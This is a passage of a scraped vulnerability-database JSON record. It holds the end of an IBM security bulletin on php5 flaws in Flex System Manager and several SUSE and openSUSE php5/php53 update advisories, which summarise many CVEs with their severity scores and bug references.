IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Internal Use Only\n\nAdvisory 5000, PSIRT 73360\n\n[{\"Product\":{\"code\":\"HW94A\",\"label\":\"Flex System Manager Node\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-18T01:31:31", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in php5 affect IBM Flex System Manager (FSM) (CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2018-06-18T01:31:31", "id": "EB6743C0F0EED51CD05AFB7F7930AA74C8199711B80DCA1727BE820C2B90040E", "href": "https://www.ibm.com/support/pages/node/628727", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:28:45", "description": "The PHP5 script interpreter was updated to fix security issues:\n\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. [bnc#945412]\n\n", "cvss3": {}, "published": "2015-10-08T16:10:07", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-10-08T16:10:07", "id": "SUSE-SU-2015:1701-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-10/msg00006.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:46:39", "description": "This update of PHP5 brings several security fixes.\n\n Security fixes:\n * CVE-2015-6831: A use after free vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#942291] [bnc#942294] [bnc#942295]\n * CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject\n items could be used to crash php or potentially execute code.\n [bnc#942293]\n * CVE-2015-6833: A directory traversal when extracting ZIP files could be\n used to overwrite files outside of intended area. [bnc#942296]\n * CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#945403]\n * CVE-2015-6835: A Use After Free Vulnerability in session unserialize()\n has been fixed which could be used to crash php or potentially execute\n code. [bnc#945402]\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. [bnc#945412]\n\n Bugfixes:\n * Compare with SQL_NULL_DATA correctly [bnc#935074]\n * If MD5 was disabled in net-snmp we have to disable the used MD5 function\n in ext/snmp/snmp.c as well. (bsc#944302)\n\n Also the Suhosin framework was updated to 0.9.38. [fate#319325]\n\n", "cvss3": {}, "published": "2015-09-25T15:09:56", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6832", "CVE-2015-6838"], "modified": "2015-09-25T15:09:56", "id": "SUSE-SU-2015:1633-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00026.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:15:22", "description": "The PHP5 script interpreter was updated to fix various security issues:\n\n * CVE-2015-6831: A use after free vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#942291] [bnc#942294] [bnc#942295]\n * CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject\n items could be used to crash php or potentially execute code.\n [bnc#942293]\n * CVE-2015-6833: A directory traversal when extracting ZIP files could be\n used to overwrite files outside of intended area. [bnc#942296]\n * CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#945403]\n * CVE-2015-6835: A Use After Free Vulnerability in session unserialize()\n has been fixed which could be used to crash php or potentially execute\n code. [bnc#945402]\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. [bnc#945412]\n\n", "cvss3": {}, "published": "2015-09-25T11:09:46", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6832", "CVE-2015-6838"], "modified": "2015-09-25T11:09:46", "id": "OPENSUSE-SU-2015:1628-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00025.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:22:34", "description": "This update of PHP5 brings several security fixes.\n\n Security fixes:\n * CVE-2015-6831: A use after free vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#942291] [bnc#942294] [bnc#942295]\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. [bnc#945412]\n\n It also includes a bugfix for the odbc module:\n * compare with SQL_NULL_DATA correctly [bnc#935074]\n\n", "cvss3": {}, "published": "2015-10-26T15:09:54", "type": "suse", "title": "Security update for php53 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-10-26T15:09:54", "id": "SUSE-SU-2015:1818-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-10/msg00022.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:09:51", "description": "This update for php53 to version 5.3.17 fixes the following issues:\n\n These security issues were fixed:\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n - CVE-2016-5094: Don't create strings with lengths outside int range\n (bnc#982011).\n - CVE-2016-5095: Don't create strings with lengths outside int range\n (bnc#982012).\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP\n mishandles driver behavior for SQL_WVARCHAR columns, which allowed\n remote attackers to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the odbc_fetch_array\n function to access a certain type of Microsoft SQL Server table\n (bsc#981050).\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP allowed remote attackers to\n execute arbitrary code by triggering a failed SplMinHeap::compare\n operation (bsc#980366).\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed\n remote attackers to cause a denial of service via a crafted\n imagefilltoborder call (bsc#980375).\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c\n in PHP allowed remote attackers to cause a denial of service\n (segmentation fault) via recursive method calls (bsc#980373).\n - CVE-2016-4540: The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829).\n - CVE-2016-4541: The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829.\n - CVE-2016-4542: The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP did not properly construct spprintf arguments, which allowed remote\n attackers to cause a denial of service (out-of-bounds read) or possibly\n have unspecified other impact via crafted header data (bsc#978830).\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in ext/exif/exif.c\n in PHP did not validate IFD sizes, which allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in ext/exif/exif.c\n in PHP did not validate TIFF start data, which allowed remote attackers\n to cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4537: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n accepted a negative integer for the scale argument, which allowed remote\n attackers to cause a denial of service or possibly have unspecified\n other impact via a crafted call (bsc#978827).\n - CVE-2016-4538: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n modified certain data structures without considering whether they are\n copies of the _zero_, _one_, or _two_ global variable, which allowed\n remote attackers to cause a denial of service or possibly have\n unspecified other impact via a crafted call (bsc#978827).\n - CVE-2016-4539: The xml_parse_into_struct function in ext/xml/xml.c in\n PHP allowed remote attackers to cause a denial of service (buffer\n under-read and segmentation fault) or possibly have unspecified other\n impact via crafted XML data in the second argument, leading to a parser\n level of zero (bsc#978828).\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles zero-length\n uncompressed data, which allowed remote attackers to cause a denial of\n service (heap memory corruption) or possibly have unspecified other\n impact via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive (bsc#977991).\n - CVE-2016-4346: Integer overflow in the str_pad function in\n ext/standard/string.c in PHP allowed remote attackers to cause a denial\n of service or possibly have unspecified other impact via a long string,\n leading to a heap-based buffer overflow (bsc#977994).\n - CVE-2016-4073: Multiple integer overflows in the mbfl_strcut function in\n ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via a crafted mb_strcut call (bsc#977003).\n - CVE-2015-8867: The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP incorrectly relied on the deprecated\n RAND_pseudo_bytes function, which made it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors\n (bsc#977005).\n - CVE-2016-4070: Integer overflow in the php_raw_url_encode function in\n ext/standard/url.c in PHP allowed remote attackers to cause a denial of\n service (application crash) via a long string to the rawurlencode\n function (bsc#976997).\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM is used, did not\n isolate each thread from libxml_disable_entity_loader changes in other\n threads, which allowed remote attackers to conduct XML External Entity\n (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document,\n a related issue to CVE-2015-5161 (bsc#976996).\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a client SSL option to\n mean that SSL is optional, which allowed man-in-the-middle attackers to\n spoof servers via a cleartext-downgrade attack, a related issue to\n CVE-2015-3152 (bsc#973792).\n - CVE-2015-8835: The make_http_soap_request function in\n ext/soap/php_http.c in PHP did not properly retrieve keys, which allowed\n remote attackers to cause a denial of service (NULL pointer dereference,\n type confusion, and application crash) or possibly execute arbitrary\n code via crafted serialized data representing a numerically indexed\n _cookies array, related to the SoapClient::__call method in\n ext/soap/soap.c (bsc#973351).\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP allowed remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly have unspecified\n other impact by triggering a wddx_deserialize call on XML data\n containing a crafted var element (bsc#969821).\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a PK\\x05\\x06\n signature at an invalid location (bsc#971912).\n - CVE-2014-9767: Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in PHP\n ext/zip/ext_zip.cpp in HHVM allowed remote attackers to create arbitrary\n empty directories via a crafted ZIP archive (bsc#971612).\n - CVE-2016-3185: The make_http_soap_request function in\n ext/soap/php_http.c in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized _cookies data,\n related to the SoapClient::__call method in ext/soap/soap.c (bsc#971611).\n - CVE-2016-2554: Stack-based buffer overflow in ext/phar/tar.c in PHP\n allowed remote attackers to cause a denial of service (application\n crash) or possibly have unspecified other impact via a crafted TAR\n archive (bsc#968284).\n - CVE-2015-7803: The phar_get_entry_data function in ext/phar/util.c in\n PHP allowed remote attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file with a crafted TAR\n archive entry in which the Link indicator references a file that did not\n exist (bsc#949961).\n - CVE-2015-6831: Multiple use-after-free vulnerabilities in SPL in PHP\n allowed remote attackers to execute arbitrary code via vectors involving\n (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList,\n which are mishandled during unserialization (bsc#942291).\n - CVE-2015-6833: Directory traversal vulnerability in the PharData class\n in PHP allowed remote attackers to write to arbitrary files via a ..\n (dot dot) in a ZIP archive entry that is mishandled during an extractTo\n call (bsc#942296.\n - CVE-2015-6836: The SoapClient __call method in ext/soap/soap.c in PHP\n did not properly manage headers, which allowed remote attackers to\n execute arbitrary code via crafted serialized data that triggers a "type\n confusion" in the serialize_function_call function (bsc#945428).\n - CVE-2015-6837: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation during initial error checking, which allowed remote attackers\n to cause a denial of service (NULL pointer dereference and application\n crash) via a crafted XML document, a different vulnerability than\n CVE-2015-6838 (bsc#945412).\n - CVE-2015-6838: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation after the principal argument loop, which allowed remote\n attackers to cause a denial of service (NULL pointer dereference and\n application crash) via a crafted XML document, a different vulnerability\n than CVE-2015-6837 (bsc#945412).\n - CVE-2015-5590: Stack-based buffer overflow in the phar_fix_filepath\n function in ext/phar/phar.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via a large\n length value, as demonstrated by mishandling of an e-mail attachment by\n the imap PHP extension (bsc#938719).\n - CVE-2015-5589: The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP did not validate a file pointer a close\n operation, which allowed remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other impact via a\n crafted TAR archive that is mishandled in a Phar::convertToData call\n (bsc#938721).\n - CVE-2015-4602: The __PHP_Incomplete_Class function in\n ext/standard/incomplete_class.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935224).\n - CVE-2015-4599: The SoapFault::__toString method in ext/soap/soap.c in\n PHP allowed remote attackers to obtain sensitive information, cause a\n denial of service (application crash), or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935226).\n - CVE-2015-4600: The SoapClient implementation in PHP allowed remote\n attackers to cause a denial of service (application crash) or possibly\n execute arbitrary code via an unexpected data type, related to "type\n confusion" issues in the (1) SoapClient::__getLastRequest, (2)\n SoapClient::__getLastResponse, (3) SoapClient::__getLastRequestHeaders,\n (4) SoapClient::__getLastResponseHeaders, (5) SoapClient::__getCookies,\n and (6) SoapClient::__setCookie methods (bsc#935226).\n - CVE-2015-4601: PHP allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code via an unexpected\n data type, related to "type confusion" issues in (1)\n ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and (3)\n ext/soap/soap.c, a different issue than CVE-2015-4600 (bsc#935226.\n - CVE-2015-4603: The exception::getTraceAsString function in\n Zend/zend_exceptions.c in PHP allowed remote attackers to execute\n arbitrary code via an unexpected data type, related to a "type\n confusion" issue (bsc#935234).\n - CVE-2015-4644: The php_pgsql_meta_data function in pgsql.c in the\n PostgreSQL (aka pgsql) extension in PHP did not validate token\n extraction for table names, which might allowed remote attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) via a crafted name. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2015-1352 (bsc#935274).\n - CVE-2015-4643: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow. NOTE: this vulnerability exists because of an incomplete fix\n for CVE-2015-4022 (bsc#935275).\n - CVE-2015-3411: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n load method, (2) the xmlwriter_open_uri function, (3) the finfo_file\n function, or (4) the hash_hmac_file function, as demonstrated by a\n filename\\0.xml attack that bypasses an intended configuration in which\n client users may read only .xml files (bsc#935227).\n - CVE-2015-3412: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read arbitrary files via\n crafted input to an application that calls the\n stream_resolve_include_path function in ext/standard/streamsfuncs.c, as\n demonstrated by a filename\\0.extension attack that bypasses an intended\n configuration in which client users may read files with only one\n specific extension (bsc#935229).\n - CVE-2015-4598: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n save method or (2) the GD imagepsloadfont function, as demonstrated by a\n filename\\0.html attack that bypasses an intended configuration in which\n client users may write to only .html files (bsc#935232).\n - CVE-2015-4148: The do_soap_call function in ext/soap/soap.c in PHP did\n not verify that the uri property is a string, which allowed remote\n attackers to obtain sensitive information by providing crafted\n serialized data with an int data type, related to a "type confusion"\n issue (bsc#933227).\n - CVE-2015-4024: Algorithmic complexity vulnerability in the\n multipart_buffer_headers function in main/rfc1867.c in PHP allowed\n remote attackers to cause a denial of service (CPU consumption) via\n crafted form data that triggers an improper order-of-growth outcome\n (bsc#931421).\n - CVE-2015-4026: The pcntl_exec implementation in PHP truncates a pathname\n upon encountering a \\x00 character, which might allowed remote attackers\n to bypass intended extension restrictions and execute files with\n unexpected names via a crafted first argument. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2006-7243 (bsc#931776).\n - CVE-2015-4022: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow (bsc#931772).\n - CVE-2015-4021: The phar_parse_tarfile function in ext/phar/tar.c in PHP\n did not verify that the first character of a filename is different from\n the \\0 character, which allowed remote attackers to cause a denial of\n service (integer underflow and memory corruption) via a crafted entry in\n a tar archive (bsc#931769).\n - CVE-2015-3329: Multiple stack-based buffer overflows in the\n phar_set_inode function in phar_internal.h in PHP allowed remote\n attackers to execute arbitrary code via a crafted length value in a (1)\n tar, (2) phar, or (3) ZIP archive (bsc#928506).\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote attackers to obtain\n sensitive information from process memory or cause a denial of service\n (buffer over-read and application crash) via a crafted length value in\n conjunction with crafted serialized data in a phar archive, related to\n the phar_parse_metadata and phar_parse_pharfile functions (bsc#928511).\n - CVE-2015-2787: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages use of the unset function within an __wakeup function, a\n related issue to CVE-2015-0231 (bsc#924972).\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in GD 2.1.1 and\n earlier, as used in PHP allowed remote attackers to cause a denial of\n service (buffer over-read and application crash) via a crafted GIF image\n that is improperly handled by the gdImageCreateFromGif function\n (bsc#923945).\n - CVE-2015-2301: Use-after-free vulnerability in the phar_rename_archive\n function in phar_object.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via vectors\n that trigger an attempted renaming of a Phar archive to the name of an\n existing file (bsc#922452).\n - CVE-2015-2305: Integer overflow in the regcomp implementation in the\n Henry Spencer BSD regex library (aka rxspencer) 32-bit platforms might\n have allowed context-dependent attackers to execute arbitrary code via a\n large regular expression that leads to a heap-based buffer overflow\n (bsc#921950).\n - CVE-2014-9705: Heap-based buffer overflow in the\n enchant_broker_request_dict function in ext/enchant/enchant.c in PHP\n allowed remote attackers to execute arbitrary code via vectors that\n trigger creation of multiple dictionaries (bsc#922451).\n - CVE-2015-0273: Multiple use-after-free vulnerabilities in\n ext/date/php_date.c in PHP allowed remote attackers to execute arbitrary\n code via crafted serialized input containing a (1) R or (2) r type\n specifier in (a) DateTimeZone data handled by the\n php_date_timezone_initialize_from_hash function or (b) DateTime data\n handled by the php_date_initialize_from_hash function (bsc#918768).\n - CVE-2014-9652: The mconvert function in softmagic.c in file as used in\n the Fileinfo component in PHP did not properly handle a certain\n string-length field during a copy of a truncated version of a Pascal\n string, which might allowed remote attackers to cause a denial of\n service (out-of-bounds memory access and application crash) via a\n crafted file (bsc#917150).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate numerical keys within the\n serialized properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142 (bsc#910659).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP allowed remote attackers to execute arbitrary code or cause a denial\n of service (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bsc#914690).\n - CVE-2014-3670: The exif_ifd_make_value function in exif.c in the EXIF\n extension in PHP operates on floating-point arrays incorrectly, which\n allowed remote attackers to cause a denial of service (heap memory\n corruption and application crash) or possibly execute arbitrary code via\n a crafted JPEG image with TIFF thumbnail data that is improperly handled\n by the exif_thumbnail function (bsc#902357).\n - CVE-2014-3669: Integer overflow in the object_custom function in\n ext/standard/var_unserializer.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an argument to the unserialize function that triggers\n calculation of a large length value (bsc#902360).\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601 function in the\n mkgmtime implementation in libxmlrpc/xmlrpc.c in the XMLRPC extension in\n PHP allowed remote attackers to cause a denial of service (application\n crash) via (1) a crafted first argument to the xmlrpc_set_type function\n or (2) a crafted argument to the xmlrpc_decode function, related to an\n out-of-bounds read operation (bsc#902368).\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR in PHP allowed\n local users to write to arbitrary files via a symlink attack on a (1)\n rest.cachefile or (2) rest.cacheid file in /tmp/pear/cache/, related to\n the retrieveCacheFirst and useLocalCache functions (bsc#893849).\n - CVE-2014-3597: Multiple buffer overflows in the php_parserr function in\n ext/standard/dns.c in PHP allowed remote DNS servers to cause a denial\n of service (application crash) or possibly execute arbitrary code via a\n crafted DNS record, related to the dns_get_record function and the\n dn_expand function. NOTE: this issue exists because of an incomplete fix\n for CVE-2014-4049 (bsc#893853).\n - CVE-2014-4670: Use-after-free vulnerability in ext/spl/spl_dllist.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n iterator usage within applications in certain web-hosting environments\n (bsc#886059).\n - CVE-2014-4698: Use-after-free vulnerability in ext/spl/spl_array.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n ArrayIterator usage within applications in certain web-hosting\n environments (bsc#886060).\n - CVE-2014-4721: The phpinfo implementation in ext/standard/info.c in PHP\n did not ensure use of the string data type for the PHP_AUTH_PW,\n PHP_AUTH_TYPE, PHP_AUTH_USER, and PHP_SELF variables, which might\n allowed context-dependent attackers to obtain sensitive information from\n process memory by using the integer data type with crafted values,\n related to a "type confusion" vulnerability, as demonstrated by reading\n a private SSL key in an Apache HTTP Server web-hosting environment with\n mod_ssl and a PHP 5.3.x mod_php (bsc#885961).\n - CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file as\n used in the Fileinfo component in PHP allowed remote attackers to cause\n a denial of service (assertion failure and application exit) via a\n crafted CDF file (bsc#884986).\n - CVE-2014-3478: Buffer overflow in the mconvert function in softmagic.c\n in file as used in the Fileinfo component in PHP allowed remote\n attackers to cause a denial of service (application crash) via a crafted\n Pascal string in a FILE_PSTRING conversion (bsc#884987).\n - CVE-2014-3479: The cdf_check_stream_offset function in cdf.c in file as\n used in the Fileinfo component in PHP relies on incorrect sector-size\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted stream offset in a CDF file\n (bsc#884989).\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in file as used in\n the Fileinfo component in PHP did not properly validate sector-count\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted CDF file (bsc#884990).\n - CVE-2014-3487: The cdf_read_property_info function in file as used in\n the Fileinfo component in PHP did not properly validate a stream offset,\n which allowed remote attackers to cause a denial of service (application\n crash) via a crafted CDF file (bsc#884991).\n - CVE-2014-3515: The SPL component in PHP incorrectly anticipates that\n certain data structures will have the array data type after\n unserialization, which allowed remote attackers to execute arbitrary\n code via a crafted string that triggers use of a Hashtable destructor,\n related to "type confusion" issues in (1) ArrayObject and (2)\n SPLObjectStorage (bsc#884992).\n\n These non-security issues were fixed:\n - bnc#935074: compare with SQL_NULL_DATA correctly\n - bnc#935074: fix segfault in odbc_fetch_array\n - bnc#919080: fix timezone map\n - bnc#925109: unserialize SoapClient type confusion\n\n", "cvss3": {}, "published": "2016-06-21T13:08:17", "type": "suse", "title": "Security update for php53 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2014-9767", "CVE-2016-4342", "CVE-2015-2783", "CVE-2015-8873", "CVE-2015-5161", "CVE-2015-3329", "CVE-2014-3478", "CVE-2016-4540", "CVE-2016-4538", "CVE-2015-4644", "CVE-2015-8879", "CVE-2015-1352", "CVE-2016-3185", "CVE-2016-4544", "CVE-2015-2301", "CVE-2014-3515", "CVE-2014-3479", "CVE-2015-8867", "CVE-2014-9709", "CVE-2014-4670", "CVE-2015-2305", "CVE-2016-4543", "CVE-2014-3668", "CVE-2015-0273", "CVE-2016-4542", "CVE-2016-4541", "CVE-2014-3480", "CVE-2014-8142", "CVE-2015-4148", "CVE-2006-7243", "CVE-2014-0207", "CVE-2016-2554", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-8835", "CVE-2015-4021", "CVE-2014-3487", "CVE-2014-3597", "CVE-2015-6836", "CVE-2015-3152", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-6833", "CVE-2014-4721", "CVE-2016-4070", "CVE-2014-4698", "CVE-2015-8874", "CVE-2015-3411", "CVE-2015-4116", "CVE-2014-4049", "CVE-2015-6831", "CVE-2014-3670", "CVE-2015-5590", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2016-4539", "CVE-2015-6837", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-4073", "CVE-2015-7803", 